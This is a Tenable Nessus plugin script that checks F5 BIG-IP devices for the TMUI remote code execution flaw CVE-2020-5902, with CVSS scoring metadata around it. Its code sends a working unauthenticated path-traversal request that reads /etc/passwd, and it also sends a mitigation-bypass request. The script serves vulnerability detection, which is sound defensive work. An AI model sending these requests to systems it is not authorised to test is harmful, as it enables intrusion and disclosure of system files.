CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
100.0%
A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.
#
# (C) Tenable Network Security, Inc.
#
include('compat.inc');
if (description)
{
script_id(138140);
script_version("1.14");
script_set_attribute(attribute:"plugin_modification_date", value:"2023/01/18");
script_cve_id("CVE-2020-5902");
script_xref(name:"IAVA", value:"2020-A-0283-S");
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/05/03");
script_xref(name:"CISA-NCAS", value:"AA22-011A");
script_xref(name:"CEA-ID", value:"CEA-2020-0129");
script_xref(name:"CEA-ID", value:"CEA-2020-0122");
script_xref(name:"CEA-ID", value:"CEA-2020-0055");
script_name(english:"F5 Networks BIG-IP : TMUI RCE (CVE-2020-5902) (Direct Check)");
script_set_attribute(attribute:"synopsis", value:
"BIG-IP Traffic Management User Interface Remote Code Execution.");
script_set_attribute(attribute:"description", value:
"A remote code execution vulnerability exists in Traffic Management User Interface (TMUI), also referred to as the
Configuration utility. An unauthenticated, remote attacker can exploit this to bypass authentication and execute
arbitrary system commands, create or delete files, disable services, and/or execute arbitrary Java code.
Note: An initial mitigation for this vulnerability was released by the vendor, which can be bypassed.
This plugin also tests for the bypass of that initial mitigation.");
script_set_attribute(attribute:"see_also", value:"https://support.f5.com/csp/article/K52145254");
script_set_attribute(attribute:"solution", value:
"Upgrade to a version recommended in the vendor advisory.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_set_cvss3_temporal_vector("CVSS:3.0/E:H/RL:O/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2020-5902");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"d2_elliot_name", value:"F5 BIG-IP Traffic Management User Interface File Disclosure");
script_set_attribute(attribute:"exploit_framework_d2_elliot", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"exploited_by_nessus", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'F5 BIG-IP TMUI Directory Traversal and File Upload RCE');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"vuln_publication_date", value:"2020/07/01");
script_set_attribute(attribute:"patch_publication_date", value:"2020/07/01");
script_set_attribute(attribute:"plugin_publication_date", value:"2020/07/06");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/h:f5:big-ip");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_access_policy_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_advanced_firewall_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_analytics");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_acceleration_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_application_security_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_domain_name_system");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_fraud_protection_service");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_global_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_link_controller");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_local_traffic_manager");
script_set_attribute(attribute:"cpe", value:"cpe:/a:f5:big-ip_policy_enforcement_manager");
script_set_attribute(attribute:"stig_severity", value:"I");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("bigip_web_detect.nasl");
script_require_keys("installed_sw/F5 BIG-IP web management");
script_require_ports("Services/www", 80, 443);
exit(0);
}
include('http.inc');
include('install_func.inc');
app = 'F5 BIG-IP web management';
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:443, ignore_broken:TRUE, embedded:TRUE);
install = get_single_install(app_name:app, port:port);
passwd_pattern = "root:.*:0:[01]:";
poc_path = '/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd';
bypass_path = '/hsqldb;';
file = "/etc/passwd";
generic = FALSE;
line_limit = 10;
url = build_url(qs:"/", port:port);
res = http_send_recv3(
method : 'GET',
port : port,
item : poc_path,
exit_on_fail : TRUE
);
if (!egrep(pattern:passwd_pattern, string:res[2]))
{
res = http_send_recv3(
method : 'GET',
port : port,
item : bypass_path,
exit_on_fail : TRUE
);
if('HSQL Database Engine Servlet'>< res[2])
{
output = chomp(res[2]);
file = NULL;
generic = TRUE;
line_limit = 3;
}
else
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
}
else{
output = str_replace(string:res[2], find:'\\n', replace:'\n');
}
security_report_v4(
port : port,
severity : SECURITY_HOLE,
request : make_list(http_last_sent_request()),
file : file,
generic : generic,
output : output,
line_limit : line_limit,
attach_type : 'text/plain'
);
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EPSS
Percentile
100.0%